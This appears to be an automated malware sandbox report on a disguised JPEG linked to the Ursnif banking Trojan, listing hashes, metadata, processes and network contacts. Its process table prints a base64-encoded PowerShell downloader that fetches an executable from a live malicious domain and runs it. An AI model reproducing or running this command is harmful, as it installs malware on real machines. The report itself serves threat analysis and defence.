File name: | pixel.jpg |
Full analysis: | https://app.any.run/tasks/5a530de8-22f2-449a-8839-082c3eb31d5a |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date: | March 21, 2019, 10:54:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | image/jpeg |
File info: | JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 232x309, frames 3 |
MD5: | 682CD610E4135E8A3203E9994076961D |
SHA1: | C3016D7F6547536B5B11EBB15FBBBC46EECD39B9 |
SHA256: | 4A1832614F81E61521B7BC845766678B9411C6D09460EDB8310ABBB03A6D5EE2 |
SSDEEP: | 384:2KcrBurfMKAU2HipomnJb93HP63nr/Fdos5E6B6Non4xpq3jYC+AxwEX9VcBgC6i:25BuIRU2CpomnJZvWnbF636BSonm+xwN |
.jpg | | | JFIF-EXIF JPEG Bitmap (38.4) |
---|---|---|
.jpg | | | JFIF JPEG bitmap (30.7) |
.jpg | | | JPEG bitmap (23) |
.mp3 | | | MP3 audio (7.6) |
JFIFVersion: | 1.01 |
---|---|
ResolutionUnit: | None |
XResolution: | 72 |
YResolution: | 72 |
Orientation: | Horizontal (normal) |
---|---|
XResolution: | 72 |
YResolution: | 72 |
ResolutionUnit: | inches |
ColorSpace: | sRGB |
ExifImageWidth: | 232 |
ExifImageHeight: | 309 |
IPTCDigest: | d41d8cd98f00b204e9800998ecf8427e |
---|
ImageSize: | 232x309 |
---|---|
Megapixels: | 0.072 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1756 | "C:\Windows\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Desktop\pixel.jpg | C:\Windows\System32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2724 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4080 | powershell -e JABHAHcAUQBEAG8AWAA9ACgAJwBEAEEAXwB4AHcAQQAnACsAJwBEACcAKwAnAHcAJwApADsAJABNAEEAQwBBAFUAQgBvAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABhAEEAQQBjAEMAQQB3AD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AbQBrACcAKwAnAGEAdABhAHIAaQBuAGEANwAwACcAKwAnADkAJwArACcANABtAGEAeQBiAGUAbAAnACsAJwBsAGUAJwArACcALgBlACcAKwAnAG0AYQAnACsAJwBpAGwAJwArACcALwBsAG8AcQA5ACcAKwAnADEALwAxADAAeAAnACsAJwAuAHAAaABwACcAKwAnAD8AbAAnACsAJwA9AHAAbwBmACcAKwAnAGUAeAA1AC4AJwArACcAagBhACcAKwAnAGQAJwApAC4AKAAnAFMAcABsACcAKwAnAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAHAAQQBBAFUAQQBDAEEAQQA9ACgAJwBqAFEAWgBCACcAKwAnAEcAJwArACcAawBEACcAKQA7ACQATgBHAFoAWABjAHgAVQAgAD0AIAAoACcAMgAnACsAJwA1ADcAJwApADsAJAB3AFEAUQBaAHcAWABBAD0AKAAnAG8AJwArACcAVQBDAGMAMQBBACcAKQA7ACQAYwBBAFUAXwBBADEAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBHAFoAWABjAHgAVQArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEMAQgBRAFoAQQBBAFUAWgAgAGkAbgAgACQAYQBBAEEAYwBDAEEAdwApAHsAdAByAHkAewAkAE0AQQBDAEEAVQBCAG8ALgAoACcARABvAHcAbgBsACcAKwAnAG8AYQAnACsAJwBkACcAKwAnAEYAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAEMAQgBRAFoAQQBBAFUAWgAsACAAJABjAEEAVQBfAEEAMQBBACkAOwAkAFYAQQBCAEEAQgBrAD0AKAAnAGIAdwAnACsAJwBBAEQAawAnACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABjAEEAVQBfAEEAMQBBACkALgAiAEwAYABlAGAATgBHAFQAaAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBBAFUAXwBBADEAQQA7ACQAYQBRAEEAQgBHAFoAbwA9ACgAJwBPAEEAQQBBACcAKwAnAFEAJwArACcAWAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAegBDAEQAeABBAEQAQQBBAD0AKAAnAHoAJwArACcAQQBBACcAKwAnAEEAQQBCAEIAWgAnACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XYF8576LIP4H9YRZNKXA.temp | — | |
MD5:— | SHA256:— | |||
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfd0c4.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4080 | powershell.exe | GET | 404 | 89.223.28.79:80 | http://mkatarina7094maybelle.email/loq91/10x.php?l=pofex5.jad | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4080 | powershell.exe | 89.223.28.79:80 | mkatarina7094maybelle.email | Trader soft LLC | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
mkatarina7094maybelle.email |
| malicious |